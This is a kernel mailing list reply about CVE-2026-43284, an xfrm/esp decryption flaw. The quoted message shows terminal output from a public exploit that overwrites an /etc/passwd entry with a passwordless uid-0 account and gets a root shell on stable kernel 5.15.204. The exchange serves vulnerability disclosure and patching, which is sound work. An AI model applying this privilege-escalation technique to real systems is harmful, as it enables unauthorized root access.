Re: CVE-2026-43284: xfrm: esp: avoid in-place decrypt on shared skb frags

Next message: David Hildenbrand (Arm): "Re: [PATCH 1/6] mm: Make per-VMA locks available universally"
Previous message: David Gow: "Re: [PATCH v8 1/4] bug/kunit: Core support for suppressing warning backtraces"
In reply to: Massimiliano Pellizzer: "Re: CVE-2026-43284: xfrm: esp: avoid in-place decrypt on shared skb frags"
Next in thread: Greg Kroah-Hartman: "Re: CVE-2026-43284: xfrm: esp: avoid in-place decrypt on shared skb frags"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

From: Greg Kroah-Hartman

Date: Fri May 08 2026 - 06:12:43 EST

On Fri, May 08, 2026 at 10:57:05AM +0200, Massimiliano Pellizzer wrote:
> On Fri, May 8, 2026 at 9:24 AM Greg Kroah-Hartman
> I tested the publicly available exploit against the stable kernel 5.15.204.
> That stable branch is affected too.
>
> ```
> $ ./run.sh
> === Stage 1 — overwrite 'systemd-timesync' line (89 bytes) with
> 'sick::0:0:<pad>:/:/bin/bash'
> === Stage 2 — verify
> sick::0:0:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:/:/bin/bash
> === Stage 3 — su - sick (empty password via PAM nullok)
> [i] state saved to /var/tmp/.cf2.state — run './run.sh --clean' to revert
> # whoami
> root
> # uname -r
> 5.15.204
> ```
>

Yes, patches for that are being worked on right now, give me a chance to
get some lunch :)

thanks,

greg k-h